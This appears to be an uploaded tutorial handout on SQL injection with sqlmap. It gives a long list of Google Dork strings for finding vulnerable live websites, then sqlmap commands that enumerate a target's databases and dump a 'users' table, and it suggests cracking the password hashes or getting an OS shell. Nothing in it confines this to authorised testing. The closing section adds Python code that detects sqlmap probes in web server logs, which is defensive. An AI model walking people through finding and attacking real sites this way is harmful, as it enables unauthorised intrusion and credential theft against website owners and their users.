Topic 6b - Web Application SQL Injection Testing - Using Sqlmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.

Uploaded by rojaluteshi28

Hacking Web Applications: SQL Injection Using Sqlmap

Sqlmap
 Sqlmap is one of the most popular and powerful SQL injection automation tools out there.
 Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, like extracting database names, tables, columns, and all the data in the tables.
 It can even read and write files on the remote file system under certain conditions.
 Written in Python, it is one of the most powerful hacking tools out there.
 Sqlmap is the Metasploit of SQL injection.

 Sqlmap is included in pen-testing Linux distributions like Kali Linux, BackTrack, BackBox etc.

 On other operating systems, it can simply be downloaded from the following URL: http://sqlmap.org/.

 Since it is written in Python, you first have to install Python on your system if you are using Windows.

Step 1: Find a Vulnerable Website

 This is usually the toughest bit and takes longer than any other step.
 Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search for in Google.
 Just copy and paste any of the lines into Google and it will show you a number of search results.

Step 1.a: Google Dork strings to find SQL-injectable websites for sqlmap
Examples

Google Dork string (column 1) Google Dork string (column 2) Google Dork string (column 3)

inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=

inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=

inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=

inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=

inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=

inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=

inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=

inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=

inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=

inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=

inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=

inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=

inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=

inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=

inurl:newsticker_info.php?idn= inurl:news.php?id= inurl:collectionitem.php?id=

inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=

inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=

inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=

inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=

inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=

inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=

inurl:select_biblio.php?id= inurl:pageid= inurl:shopping.php?id=

inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=

inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=

inurl:ogl_inet.php?ogl_id= inurl:newsDetail.php?id= inurl:viewshowdetail.php?id=

inurl:fiche_spectacle.php?id= inurl:gallery.php?id= inurl:clubpage.php?id=

inurl:communique_detail.php?id= inurl:article.php?id= inurl:memberInfo.php?id=

inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=

inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=

inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=

inurl:shredder-categories.php?id= inurl:readnews.php?id= inurl:index.php?id=

inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID= inurl:historialeer.php?num= inurl:show_an.php?id=

inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=

inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=

inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=

inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=

inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=

inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=

inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=

inurl:news.php?id= inurl:participant.php?id=

inurl:avd_start.php?avd= inurl:download.php?id=

inurl:event.php?id= inurl:main.php?id=

inurl:product-item.php?id= inurl:review.php?id=

inurl:sql.php?id= inurl:chappies.php?id=

inurl:material.php?id= inurl:read.php?id=

inurl:clanek.php4?id= inurl:prod_detail.php?id=

inurl:announce.php?id= inurl:viewphoto.php?id=

inurl:chappies.php?id= inurl:article.php?id=

inurl:read.php?id= inurl:person.php?id=

inurl:viewapp.php?id= inurl:productinfo.php?id=

inurl:viewphoto.php?id= inurl:showimg.php?id=

inurl:rub.php?idr= inurl:view.php?id=

inurl:galeri_info.php?l= inurl:website.php?id=

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system.

The "--dbs" option is used to get the database list.

The output shows the existing databases on the remote system.

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Get columns of a table

Now that we have the list of tables, it would be a good idea to get the columns of some important table.

Let's say the table is 'users' and it contains the username and password.

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Get data from a table

Now comes the most interesting part: extracting the data from the table.

The command would be:

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

The above command simply dumps the data of that table, much like the mysqldump command.
The output might look similar to this

 The hash column seems to hold the password hash. Try cracking the hash and you would get the login details right away.
 sqlmap will create a CSV file containing the dumped data for easy analysis.
 So far we have been able to collect a lot of information from the remote database using sqlmap.
 It's almost like having direct access to the remote database through a client like phpMyAdmin.
 In real scenarios, hackers would try to gain a higher level of access to the system.
 For this, they would try to crack the password hashes and log in through the admin panel, or they would try to get an OS shell using sqlmap.
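The enumeration walked through above leaves a distinctive footprint in the target's web server logs: a burst of requests to one URL whose parameter value is mutated with SQL fragments, sent by default with a User-Agent that begins with "sqlmap/". The following Python example is added here (it is not part of the handout or of sqlmap) and runs both checks over constructed Apache combined-format log lines; the client addresses, timestamps and the sqlmap version string are made up, and the threshold of two SQL-like values per parameter is an assumption.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines, not real traffic: the client
# addresses are documentation ranges and the sqlmap version string is invented.
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /section.php?id=51 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2024:10:00:02 +0000] "GET /section.php?id=51 HTTP/1.1" 200 4021 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.9 - - [10/Mar/2024:10:00:02 +0000] "GET /section.php?id=51%20AND%201%3D1 HTTP/1.1" 200 4021 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.9 - - [10/Mar/2024:10:00:03 +0000] "GET /section.php?id=51%20AND%201%3D2 HTTP/1.1" 200 3790 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '192.0.2.44 - - [10/Mar/2024:10:00:04 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Mar/2024:10:00:05 +0000] "GET /section.php?id=51%20AND%20SLEEP(5) HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Characters and keywords that never belong in a numeric id but show up in
# boolean-, UNION- and time-based injection probes.
SQLI_RE = re.compile(r"['\"();]|\b(and|or|union|select|sleep|benchmark)\b", re.I)

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_params(target):
    """Names of the query parameters whose decoded value looks like SQL, not data."""
    query = urlsplit(target).query  # parse_qsl percent-decodes the values for us
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if SQLI_RE.search(v)]

def analyze(lines, burst_threshold=2):
    """Map each flagged client IP to a sorted list of reasons it was flagged."""
    reasons = {}
    bursts = Counter()  # (ip, path, parameter) -> count of SQL-like values seen
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"].startswith("sqlmap/"):
            reasons.setdefault(rec["ip"], set()).add("default sqlmap User-Agent")
        path = urlsplit(rec["target"]).path
        for param in suspicious_params(rec["target"]):
            bursts[(rec["ip"], path, param)] += 1
    for (ip, path, param), n in bursts.items():
        if n >= burst_threshold:
            reasons.setdefault(ip, set()).add(f"{n} SQL-like values for {path}?{param}")
    return {ip: sorted(r) for ip, r in reasons.items()}
```

The User-Agent check only catches the tool's default identity, which its --random-agent option replaces; the per-parameter burst count is the check to rely on.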
